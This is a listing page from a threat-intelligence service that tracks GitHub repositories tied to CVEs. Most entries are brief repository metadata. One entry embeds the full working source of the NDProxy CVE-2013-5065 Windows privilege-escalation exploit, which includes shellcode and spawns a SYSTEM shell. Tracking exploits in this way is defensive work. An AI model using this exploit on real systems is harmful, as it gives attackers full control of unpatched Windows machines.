Initial Access Intelligence
The "Initial Access Intelligence" module is a vital tool for cybersecurity, designed to scan GitHub repositories for the latest exploit and proof-of-concept codes for new vulnerabilities. It provides users with crucial updates on potential security threats, enabling proactive defense measures. This module helps close the gap between vulnerability discovery and patching, significantly enhancing system security.
-
Sept. 22, 2022, 1:43 p.m.
Exceed OnDemand MITM proof-of-concept
Python
Updated: 2 years, 2 months ago3 stars 0 fork 0 watcherBorn at : Dec. 16, 2013, 4:48 p.m. This repo has been linked 3 different CVEs too. -
Aug. 12, 2024, 7:12 p.m.
A PHP version scanner for reporting possible vulnerabilities
security php scans risk cve
PHP HTML
Updated: 3 months, 1 week ago254 stars 24 fork 24 watcherBorn at : Dec. 13, 2013, 9:03 p.m. This repo has been linked 2 different CVEs too. -
Jan. 7, 2014, 1:19 p.m.
bind9.9.4 定制版本
C XSLT Perl Shell C++ Objective-C Tcl Python Awk CSS
Updated: 10 years, 10 months ago0 stars 1 fork 1 watcherBorn at : Dec. 12, 2013, 3:26 p.m. This repo has been linked 0 different CVEs too. -
Sept. 4, 2016, 4:47 p.m.
# NDPROXY Local SYSTEM privilege escalation # http://www.offensive-security.com # Tested on Windows XP SP3 # http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/ # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ?? ??? from ctypes import * from ctypes.wintypes import * import os, sys kernel32 = windll.kernel32 ntdll = windll.ntdll GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 FILE_SHARE_READ = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE = 0x0020 PROCESS_VM_READ = 0x0010 MEM_COMMIT = 0x00001000 MEM_RESERVE = 0x00002000 MEM_FREE = 0x00010000 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = 2097151 FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0 def log(msg): print msg def getLastError(): """[-] Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), 0, buf, sizeof(buf), NULL): log(buf.value) else: log("[-] Unknown Error") print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" print "[*] Vulnerability found in the wild" print "[*] Coded by Offensive Security" tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) InBuf = c_char_p(tmp) dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS: print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus getLastError() written = c_ulong() sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0: print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc getLastError() dwRetBytes = DWORD(0) DEVICE_NAME = "\\\\.\\NDProxy" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1: print "[-] Couldn't open the device... :(" sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print "[+] Spawning SYSTEM Shell..." os.system("start /d \"C:\\windows\\system32\" cmd.exe")
Updated: 8 years, 2 months ago0 stars 1 fork 1 watcherBorn at : Dec. 7, 2013, 5:37 a.m. This repo has been linked 1 different CVEs too. -
March 1, 2017, 1:21 a.m.
Personal resume with personal/location information redacted.
Shell CSS
Updated: 7 years, 8 months ago0 stars 0 fork 0 watcherBorn at : Dec. 2, 2013, 2:57 a.m. This repo has been linked 2 different CVEs too. -
May 21, 2022, 4:49 a.m.
CVE-2013-6282 exploit
C
Updated: 2 years, 6 months ago7 stars 2 fork 2 watcherBorn at : Nov. 28, 2013, 8:34 a.m. This repo has been linked 1 different CVEs too. -
March 24, 2023, 11:10 p.m.
My Vim configuration
vim vimrc vim-configuration vim-configs vimscript vim-script viml
Vim Script
Updated: 1 year, 7 months ago1 stars 0 fork 0 watcherBorn at : Nov. 28, 2013, 12:38 a.m. This repo has been linked 0 different CVEs too. -
Jan. 20, 2022, 12:45 a.m.
Read and write Java-style .properties files with minimal intrusiveness
Ruby
Updated: 2 years, 10 months ago4 stars 1 fork 1 watcherBorn at : Nov. 27, 2013, 4:04 p.m. This repo has been linked 1 different CVEs too. -
Nov. 26, 2013, 12:01 a.m.
OpenSIMS 1.0
C C++ Shell Objective-C Perl CSS XSLT ActionScript JavaScript Java
Updated: 10 years, 11 months ago0 stars 2 fork 2 watcherBorn at : Nov. 25, 2013, 11:59 p.m. This repo has been linked 1 different CVEs too. -
Dec. 9, 2013, 5:27 a.m.
A collection of the Iowa State University Fall 2013 Cyber Defense Competition (CDC) Anomalies
Updated: 10 years, 11 months ago1 stars 2 fork 2 watcherBorn at : Nov. 24, 2013, 6:13 p.m. This repo has been linked 0 different CVEs too.